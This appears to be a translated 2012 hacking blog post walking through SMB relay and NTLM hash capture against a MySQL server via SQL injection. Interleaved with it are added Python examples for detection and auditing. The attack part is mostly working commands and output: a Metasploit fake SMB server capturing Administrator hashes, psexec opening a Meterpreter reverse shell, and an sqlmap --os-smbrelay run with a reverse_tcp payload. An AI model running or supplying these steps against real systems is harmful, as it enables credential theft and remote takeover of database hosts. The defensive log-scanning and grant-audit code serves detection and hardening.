
MySQL Database Attack Techniques

Published: 2012-02-16 09:34  Source: dis9  Author: 秩名

Hello everyone. Today I am correcting an article I wrote earlier, "Databases SMBRelay AttAck", which covered SMBRelay attacks against three databases: MySQL, MSSQL and PG. The old blog's data was lost, though, so if anyone saved a copy please send it to me. (Spot a typo and leave a comment: one 九区 invite code per typo.)

When I covered the MySQL SMBRELAY ATTACK back then, the method was to load a DLL to get SYSTEM privileges first and only then carry out the attack. That approach is about as clueless as the non-mainstream brain-dead hackers over at 九区, truly dumb: once you already have SYSTEM through the DLL, what is there left to attack...

Now for the main part. If MySQL is running with Administrator privileges, this attack will succeed!

[Screenshot]

Let's do the PENTEST: an injection point, and it has ROOT privileges

[Screenshot]

Let's test whether it can read files; with ROOT it should be able to

[Screenshot]

Yep, it can read files (the great hacker HELEL makes a surprise appearance!)

Now spin up a fake SMB SERVER locally
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

Name        Current Setting   Required  Description
----        ---------------   --------  -----------
CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
CHALLENGE   1122334455667788  yes       The 8 byte challenge
JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     445               yes       The local port to listen on.
SSL         false             no        Negotiate SSL for incoming connections
SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > exploit
[*] Auxiliary module execution completed

[*] Server started.
msf auxiliary(smb) >

Then try reading the local share

[Screenshot]

^_^ Successfully captured the NTLM hash,
NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36
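From the defender's side, the tell-tale of this step is the database server being asked to open a file whose path names another host: a Windows mysqld that follows a UNC path authenticates to that host with its own service account, which is exactly what the capture above shows. The following is an added example, not code from the original post: it scans MySQL general-log lines for LOAD_FILE, LOAD DATA INFILE and INTO OUTFILE/DUMPFILE statements and flags the ones whose path is a UNC share. It assumes the classic general_log file layout (YYMMDD HH:MM:SS, thread id, command, argument); every sample line is constructed.

```python
r"""Flag MySQL general-log queries that make mysqld open a file over a UNC path.

Added example, not code from the original post. It assumes the classic
general_log file layout 'YYMMDD HH:MM:SS<tab>thread_id Command<tab>Argument';
every sample line below is constructed for the demonstration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Statement forms that make the server itself open a path. If that path is a
# UNC share, a Windows mysqld authenticates to the named host with its own account.
FILE_OP_RE = re.compile(
    r"LOAD_FILE\s*\(|"
    r"LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?(?:LOCAL\s+)?INFILE|"
    r"INTO\s+(?:OUTFILE|DUMPFILE)",
    re.IGNORECASE,
)
# A MySQL string literal ('...' or "...") with backslash escapes.
LITERAL_RE = re.compile(r"""\s*(['"])((?:\\.|(?!\1).)*)\1""")
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$"
)
ESCAPES = {"0": "\0", "b": "\b", "n": "\n", "r": "\r", "t": "\t", "Z": "\x1a"}


def unescape_sql(literal: str) -> str:
    r"""Undo MySQL backslash escapes so the text '\\\\host\\share' becomes \\host\share."""
    out, i = [], 0
    while i < len(literal):
        ch = literal[i]
        if ch == "\\" and i + 1 < len(literal):
            out.append(ESCAPES.get(literal[i + 1], literal[i + 1]))
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def unc_host(path: str) -> Optional[str]:
    r"""Return the host named by a UNC path (\\host\share or //host/share), else None."""
    if path[:2] in ("\\\\", "//"):
        host = path[2:].replace("\\", "/").split("/", 1)[0]
        return host or None
    return None


@dataclass
class Finding:
    thread: int
    operation: str              # normalised operator, e.g. 'LOAD_FILE'
    path: str                   # the path after un-escaping
    remote_host: Optional[str]  # set when the path is a UNC share
    statement: str


def scan_general_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per file operation found in Query entries."""
    findings = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        stmt = m.group("arg")
        for op in FILE_OP_RE.finditer(stmt):
            lit = LITERAL_RE.match(stmt, op.end())
            if not lit:
                continue  # path given as an expression rather than a literal
            path = unescape_sql(lit.group(2))
            operation = re.sub(r"[\s(]+", " ", op.group(0)).strip().upper()
            findings.append(Finding(int(m.group("thread")), operation, path, unc_host(path), stmt))
    return findings


def remote_file_ops(lines: Iterable[str]) -> List[Finding]:
    """The high-severity subset: file operations whose path points at another host."""
    return [f for f in scan_general_log(lines) if f.remote_host]


# Constructed sample log. Only the two UNC entries should raise an alert.
SAMPLE_LOG = [
    "120109 16:50:12\t   12 Connect\troot@192.1.1.130 on sql",
    "120109 16:50:12\t   12 Query\tSELECT id, title FROM news WHERE id=1",
    "120109 16:50:13\t   12 Query\tSELECT LOAD_FILE('C:\\\\boot.ini')",
    "120109 16:50:20\t   12 Query\tSELECT LOAD_FILE('\\\\\\\\192.1.1.1\\\\share\\\\x')",
    "120109 16:50:25\t   13 Query\tLOAD DATA INFILE '//192.1.1.1/share/y' INTO TABLE t",
    "120109 16:50:30\t   13 Query\tSELECT 1 INTO OUTFILE 'C:/tmp/out.txt'",
]

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        sev = "ALERT" if f.remote_host else "note "
        print(f"{sev} thread={f.thread} {f.operation} path={f.path!r} host={f.remote_host}")
```

Local file reads by a web account are still worth a note (they indicate a FILE-privileged injection point), but only the UNC variant means the database host has just authenticated outbound, so that is the subset to page on.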

Now you can use Metasploit's exploit/windows/smb/psexec module, or Nessus's SMB Shell, to get system privileges
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.1.1.1:1111
[*] Connecting to the server...
[*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created HgLceCLd.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting HgLceCLd.exe...
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800
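The transcript above leaves a very recognisable trace on the target: a service with a random 8-letter mixed-case name, whose binary has a similar random name and sits directly in %SYSTEMROOT% (the ADMIN$ share), created and removed within seconds. The following is an added example, not code from the original post or from Metasploit: it scores Windows System-log "service installed" (EventID 7045) records against that pattern. Event fields are modelled as plain dicts, the field wording follows the 7045 event text, and all sample records are constructed, with the names taken from the output above.

```python
"""Score EventID 7045 ('A service was installed in the system') records for the
throwaway-service pattern psexec-style tooling leaves: random mixed-case service
name, random binary dropped straight into %SYSTEMROOT%, run as LocalSystem on demand.

Added example, not code from the original post. Events are plain dicts and the
sample records are constructed (names copied from the transcript above).
"""
import re
from typing import Dict, List

Event = Dict[str, str]


def case_flip_ratio(name: str) -> float:
    """Fraction of adjacent letter pairs whose case differs. Random alpha strings
    land around 0.5; ordinary service names are far lower."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips / (len(letters) - 1)


def looks_random(name: str) -> bool:
    """Heuristic: 6-12 letters only, with case flipping at least every other character."""
    return bool(re.fullmatch(r"[A-Za-z]{6,12}", name)) and case_flip_ratio(name) >= 0.5


def image_binary(image_path: str) -> str:
    """The executable part of ImagePath: a quoted path, or the text up to the first space."""
    m = re.match(r'"([^"]+)"|(\S+)', image_path)
    return (m.group(1) or m.group(2)) if m else ""


def score_service_install(ev: Event) -> int:
    """Return 0-4; each point is one trait of the pattern described above."""
    if ev.get("EventID") != "7045":
        return 0
    binary = image_binary(ev.get("ImagePath", ""))
    stem = re.split(r"[\\/]", binary)[-1].rsplit(".", 1)[0]
    score = 0
    if looks_random(ev.get("ServiceName", "")):
        score += 1
    if looks_random(stem):
        score += 1
    # Binary directly under %SYSTEMROOT% rather than system32 or Program Files.
    if re.fullmatch(r"(?i)%systemroot%\\[^\\]+\.exe", binary):
        score += 1
    if (ev.get("AccountName", "").lower() == "localsystem"
            and ev.get("StartType", "").lower() == "demand start"):
        score += 1
    return score


def suspicious_installs(events: List[Event], threshold: int = 3) -> List[Event]:
    """Events scoring at or above the threshold; 3 tolerates one unusual-but-benign trait."""
    return [ev for ev in events if score_service_install(ev) >= threshold]


SAMPLE_EVENTS: List[Event] = [
    {   # constructed: modelled on the service the transcript shows being created
        "EventID": "7045", "ServiceName": "wZdMvYRY",
        "ImagePath": "%SYSTEMROOT%\\HgLceCLd.exe",
        "ServiceType": "user mode service", "StartType": "demand start",
        "AccountName": "LocalSystem",
    },
    {   # constructed: a benign kernel driver install
        "EventID": "7045", "ServiceName": "vmci",
        "ImagePath": "system32\\DRIVERS\\vmci.sys",
        "ServiceType": "kernel mode driver", "StartType": "boot start",
        "AccountName": "",
    },
    {   # constructed: a benign user-mode service under Program Files
        "EventID": "7045", "ServiceName": "MyBackupAgent",
        "ImagePath": "\"C:\\Program Files\\Backup\\agent.exe\" -service",
        "ServiceType": "user mode service", "StartType": "auto start",
        "AccountName": "LocalSystem",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_service_install(ev), ev["ServiceName"], ev["ImagePath"])
```

The score is deliberately additive rather than a single regex, so a legitimately odd name or a binary in an unusual directory alone does not alert; the installs that match on three or four traits are the ones to correlate with inbound SMB logons to ADMIN$ from the same source.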

 

If you find all of the above too much hassle, you can go with SQLMAP. The powerful injection tool SQLMAP offers a one-stop service.
brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
[sudo] password for brk:

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:04:54

[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
[17:04:54] [INFO] testing connection to the target url
[17:04:54] [INFO] testing if the url is stable, wait a few seconds
[17:04:55] [INFO] url is stable
---------------- omitted -------------
[17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
---

[17:05:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
[17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 1
which is the local address? [192.1.1.1]
which local port number do you want to use? [50803] 5588
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which SMB port do you want to use?
[1] 139/TCP
[2] 445/TCP (default)
> 2
[17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..

[*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
SRVHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
SRVPORT => 445
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
LPORT => 5588
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
LHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
[*] Exploit running as background job.
---------------------------------
[*] Started reverse handler on 192.1.1.1:5588
[*] Server started.
[*] Deleting AaTNBUvw.exe...
[*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270Administrator
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.1.1.1:5588 -> 192.1.1.130:1205
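Note sqlmap's own WARNING in the transcript: the attack only pays off when mysqld runs as a real user (the post's precondition that MySQL runs as Administrator), and it additionally needs an injection point with the FILE privilege and no secure_file_priv confinement. Those are the three things a DBA can check and remove. The following is an added example, not code from the original post or from sqlmap: it audits pasted SHOW GRANTS and SHOW VARIABLES output for a FILE-capable account, a privileged account reachable from any host, an empty secure_file_priv and local_infile=ON. The sample grants and variables are constructed; the service-account check is a Windows services question and is left to the operating system side.

```python
"""Audit MySQL grants and file-related server settings for the preconditions of
the attack described in the post.

Added example, not code from the original post. Input is the text of SHOW GRANTS
lines plus a dict of SHOW VARIABLES values; the sample data is constructed.
Column-level grants such as 'SELECT (col)' are not parsed.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'",
    re.IGNORECASE,
)
# Privileges that let a session make mysqld open arbitrary paths.
FILE_CAPABLE: Set[str] = {"FILE", "ALL PRIVILEGES", "ALL"}
# Privileges whose holder should never be reachable from any host.
HIGH_VALUE: Set[str] = {"FILE", "ALL PRIVILEGES", "ALL", "SUPER"}

Grant = Tuple[str, str, str, Set[str]]  # user, host, scope, privileges


def parse_grant(line: str) -> Optional[Grant]:
    """Split 'GRANT a, b ON scope TO user@host ...' into its parts, or None."""
    m = GRANT_RE.match(line.strip())
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return m.group("user"), m.group("host"), m.group("scope"), privs


def audit(grant_lines: List[str], variables: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per weak grant or setting, each with concrete advice."""
    findings: List[Dict[str, str]] = []
    for line in grant_lines:
        parsed = parse_grant(line)
        if not parsed:
            continue
        user, host, scope, privs = parsed
        acct = f"'{user}'@'{host}'"
        if scope == "*.*" and privs & FILE_CAPABLE:
            via = ", ".join(sorted(privs & FILE_CAPABLE))
            findings.append({
                "account": acct, "issue": "file-privilege",
                "advice": f"{acct} has FILE (via {via}): mysqld will read/write any path it is given; "
                          f"REVOKE FILE ON *.* FROM {acct} unless the application truly needs it",
            })
        if privs & HIGH_VALUE and host in ("%", ""):
            findings.append({
                "account": acct, "issue": "open-host",
                "advice": f"{acct} is privileged and accepted from any host; "
                          f"pin it to localhost or the application server's address",
            })
    sfp = variables.get("secure_file_priv")
    if sfp is None or sfp == "":
        findings.append({
            "account": "server", "issue": "secure_file_priv-unset",
            "advice": "secure_file_priv is empty: LOAD_FILE / LOAD DATA INFILE / INTO OUTFILE may name any "
                      "path, UNC shares included; set it to one dedicated directory, or NULL to disable",
        })
    if variables.get("local_infile", "").upper() == "ON":
        findings.append({
            "account": "server", "issue": "local_infile-on",
            "advice": "local_infile=ON: LOAD DATA LOCAL is permitted; set local_infile=OFF unless required",
        })
    return findings


# Constructed sample: what a web-tier MySQL 5.x of the era might show.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*HASH' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, FILE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `news`.* TO 'reporter'@'192.1.1.%'",
]
SAMPLE_VARIABLES = {"secure_file_priv": "", "local_infile": "ON"}

if __name__ == "__main__":
    for f in audit(SAMPLE_GRANTS, SAMPLE_VARIABLES):
        print(f"[{f['issue']}] {f['advice']}")
```

The `reporter` account produces nothing: database-scoped DML from a specific subnet is what a web application's account should look like, and an injection through it would not have had file access to begin with.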

 

[Screenshot]

And if you're on a WINDOWS system?? You can use this tool to attack: smbrelay3.exe

It offers 5 attack modes:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client and relay credentials to another SMB computer.

Original article: http://www.dis9.com/mysql-database-smbrelay-attack.html

 

Tags: Databases, Attack techniques
